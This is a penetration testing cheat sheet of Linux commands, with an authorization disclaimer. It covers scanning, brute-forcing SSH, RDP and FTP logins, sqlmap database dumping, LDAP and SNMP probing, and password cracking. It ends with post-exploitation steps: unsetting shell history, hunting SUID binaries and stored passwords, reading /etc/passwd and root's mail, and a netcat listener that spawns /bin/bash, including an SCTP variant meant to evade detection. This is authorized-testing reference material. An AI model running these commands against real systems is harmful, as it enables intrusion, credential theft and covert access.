Penetration Testing Cheat Sheet

Terms of use

The regular penetration testing could significantly improve the company's security. The auditor shall obtain all necessary rights and permissions to conduct penetration tests from the owner of the target network or from the owner of target system before conducting any audit.

All the content and resources have been provided in the hope that it will be useful. Author does not take responsibility for any misapplication of it. The document is distributed in the hope that will be useful, but WITHOUT ANY WARRANTY.

Linux Security Audit Commands

Linux Security Audit Commands:
------------------------------------------------------------Useful commands to be used over network for Linux system
# traceroutetraceroute traceroute using ICMPtraceroute -I
# nmap TCP syn scan, all TCP ports with scripts to all nmap output formatsnmap -sS -sV -sC -v -p- -oA all-tcp- -sS -sV -A -v -p- -oA all-tcp- nmap reverse DNS resolutionnmap -Pn -sn -R -oA dns- update the nmap scriptsnmap --script-updatedb# list nmap scriptsls -la /usr/share/nmap/scripts/# namp brute force scriptsnmap -vvv --script http-brute --script-args userdb=users.txt,passdb=pass.txt -p <port> <host>nmap --script vmauthd-brute -p <port> <host>nmap --script ftp-brute -p <port> <host># help for scriptnmap --script-help=ssl-heartbleed# scan using scriptnmap -sV –script=ssl-heartbleed.nse -p <port> <host># scan using set of scriptsnmap -sV --script=smb* -p <port> <host># nmap used as vulnerability scannermkdir /usr/share/nmap/scripts/vulscancd /usr/share/nmap/scripts/vulscangit clone -sV --script=vulscan/vulscan.nse
# ncrackncrack -vv --user root <host>:<port># ncrack RDPncrack -vv -U username.txt -P password.txt <host>:3389# ncrack SSHncrack -vv --user root <host>:22
# hydra# Bruteforce SSHhydra -L <user-list.txt> -P <password-list.txt> ssh://<host># Bruteforce IP router over HTTPhydra -V -l admin -P passwords.txt -t 36 -f -s 80 http-get /hydra -V -l admin -P passwords.txt -t 36 -f -s 80 http-get:// Bruteforce FTPhydra -V -l admin -P passwords.txt -e ns -f -s 21 ftp# Bruteforce RDPhydra -t 1 -V -f -l username -P password.lst rdp://
# skipfish# basic scanskipfish -o out_dir using cookies to access authenticated pagesskipfish -o out_dir -I urls_to_scan -X urls_not_to_scan -C cookie1=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX -C cookie2=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
# wfuzz# URL brute forcingwfuzz -c -z file,Directories_Common.wordlist --hc 404 http://<host>/FUZZ.php# GET params brute forcingwfuzz -c -z file,users.txt -z file,pass.txt --hc 404 http://<host>/index.php?user=FUZZ&pass=FUZ2Z
# sqlmapsqlmap -u ""sqlmap -u "" --dbms "Microsoft SQL Server" --sql-query="select name,master.sys.fn_sqlvarbasetostr(password_hash) from master.sys.sql_loginssqlmap -u "" --dbms "Microsoft SQL Server" --dbssqlmap -u "" --dbms "Microsoft SQL Server" --dump -D database -T tablesqlmap -u "" --cookie "cookie1=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"sqlmap -r POST.txt -p field
# My SQLmysql -u <username> -p --port <port> -h <host>mysqldump -h <host> -u <username> -p -f --port <port> --events --routines --triggers --all-databases > MySQLData.sql#
# Oraclesqlplus "username/password@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=hostname)(PORT=port))(CONNECT_DATA=(SERVER=dedicated)(SERVICE_NAME=servicename)))"
# Postgrespsql -h db_name username
# SNMP# SNMPv1snmpwalk -mALL -v1 -cpublic <host>snmpwalk -mALL -v1 -cprivate <host>snmpget -mALL -v1 -cpublic <host> sysName.0# SNMPv2snmpwalk -v2c -cprivate <host>:<port>snmpget -v2c -cprivate -mALL <host> sysName.0 sysObjectID.0 ilomCtrlDateAndTime.0snmpset -mALL -v2c -cprivate <host> ilomCtrlHttpEnabled.0 i 1SUN-ILOM-CONTROL-MIB::ilomCtrlHttpEnabled.0 = INTEGER: true(1)# SNMPv3snmpwalk -v3 -l authPriv -u snmpadmin -a MD5 -A PaSSword -x DES -X PRIvPassWord <host>:<port> system
# LDAPldapsearch -x -b "dc=company,dc=com" -s base -h <host>LDAPTLS_REQCERT=never ldapsearch -x -D "uid=Name.Surname,OU=People,DC=Company,DC=com" -W -H ldaps://<host> -b "uid=Name.Surname,OU=People,DC=Company,DC=com" -s subldapsearch -x -p 389 -h "" -b "ou=people,dc=company,dc=com" -s sub "objectClass=*"ldapsearch -x -p 1389 -h "" -b "dc=company,dc=com" -s one "objectClass=*"
ldapmodify -a -h "" -p 389 -D "cn=Directory Manager" -w 'password' -f modify.ldifdn: ou=people,dc=company,dc=comobjectClass: topobjectClass: organizationalunitou: people...
ldap delete -x -D "cn=Directory Manager" -w 'password' -p 1389 -h "" "uid=identifier,ou=people,dc=company,dc=com"
# NFSshowmount -e -o ro /mnt/nfs
# SSHFS# mountsshfs user@<host>:/remote/path /mnt/tmp -C -p 22# unmountfusermount -u /mnt/tmp
# redirredir --laddr=<listen_address> --lport=<listen_port> --caddr=<connect_address> --cport=<connect_port>
# sending HTTP post requestcurl --data "param1=value1&param2=value2"
# sending SOAP request#!/bin/sh
nc $HOST $PORT << __EOF__POST /services/ HTTP/1.1Host: text/xml;charset=UTF-8SOAPAction: ""
<soapenv:Envelope xmlns:soapenv="" xmlns:web=""> <soapenv:Header/> <soapenv:Body> <web:soapRequest> </web:soapRequest> </soapenv:Body></soapenv:Envelope>__EOF__
# Bash like SQL group bycat test.txt | sort | uniq -c | sort -n
# Wireshark over SSHssh root@ "sudo tcpdump -U -s0 -i lo -w - 'not port 22'" | wireshark -k -i -wireshark -k -i <(ssh root@ tcpdump -U -s0 -i any -w - not port 22)
# HEX to PCAPxxd -r -p test.hex | od -Ax -tx1 | text2pcap - test.pcap
# Parse JSONgrep -Po '"field" : .*?[^\\]",' test.json
# tshark to Elasticsearch output./tshark -i any -f tcp -T ek -e "ip.addr" -e "tcp.port"
# tshark display filter to filestshark -r input.pcap -Y "ip.src ==" -w output.pcap -F pcap
# john the ripper over GPU, OpenCL formats, start sessionjohn --session=session_name --format=opencl ~/hash.txt
# john list the GPU OpenCL formatsjohn --list=formats --format=opencl
# john the ripper, continue sessionjohn --restore=session_name
# john the ripper, show the cracked passwordsjohn ~/hash.txt --show
# dynamic formats# edit john/JohnTheRipper/run/dynamic.confjohn --fork=16 --session=session_dynamic --format=dynamic_xxxx hash.txt
------------------------------------------------------------Useful commands running locally on the Linux system.To quickly analyze the system and possibly help to escalate privileges.
# Before connecting to remote system, enable logging record the interactive session. Only after perform e.g. ssh connect.script <filename>
# loginssh username@hostname
# check current shellecho $0
# unset history fileunset HISTFILE
# check current userwhoami
# current folderpwd
# list history of the userhistory
# check systemuname -a
# check uptimeuptime
# check system variablesexport
# processesps -efps -auxfPs -auxfwww
# partitionsdf
# find in filesfind . -name "*.java" -type f -exec fgrep -iHn "textToFind" {} \;find . -regex ".*\.\(c\|java\)" -type f -exec fgrep -iHn "textToFind" {} \;find / -maxdepth 4 -name *.conf -type f -exec grep -Hn "textToFind" {} \; 2>/dev/null# SUID files owned by rootfind / -uid 0 -perm -4000 -type f 2>/dev/null# SUID files owned by root and world readablefind / -uid 0 -perm -u=s,o=r -type f -exec ls -la {} \; 2> /dev/null# SUID filesfind / -perm -4000 -type f 2>/dev/null# world writable directoriesfind / -perm -2 -type d 2>/dev/null
# find passwords in files and ignore errors and filter out the proc and other foldersfind . ! -path "*/proc/*" -type f -name "*" -exec fgrep -iHn password {} \;find . -type f \( -iname \*.conf -o -iname \*.cfg -o -iname \*.xml -o -iname \*.ini -o -iname \*.json -o -iname \*.sh -o -iname \*.pl -o -iname \*.py \) -exec fgrep -iHn password {} \; 2> /dev/null# find using several patterns read from file (patterns are delimited by new line)find . -type f -exec grep -iHFf patterns.txt {} \;

# reverse java jar files and find passwords therefind . -name "*.jar" -type f -exec ~/jd-cli/jd-cli -oc -l -n -st {} \; | egrep -i -e "Location:" -e "password" | uniq
# check open ports and services listeningnetstat -anp
# check defined hostscat /etc/hosts
# check local IP addresses and interfacesifconfig -a
# check sudo privilegessudo -l
# check crontabcrontab -l
# check inittabcat /etc/inittab
# try to sniff traffictcpdumptcpdump not port 22 -w trace.pcap
# check known hostscat ~/.ssh/known_hosts
# try access mailshead /var/mail/root
# list groups, userscat /etc/groupcat /etc/passwd
# open netcat listener# open tcp listener and execute bash after connectnc -l -p <port> -e /bin/bash# connect to ncnc <host> <port># uset sctp instead of tcp to be less detectedwithsctp nc -l -p <port> -e /bin/bashwithsctp nc <host> <port>
# logoutlogout
# close script sessionCtrl + D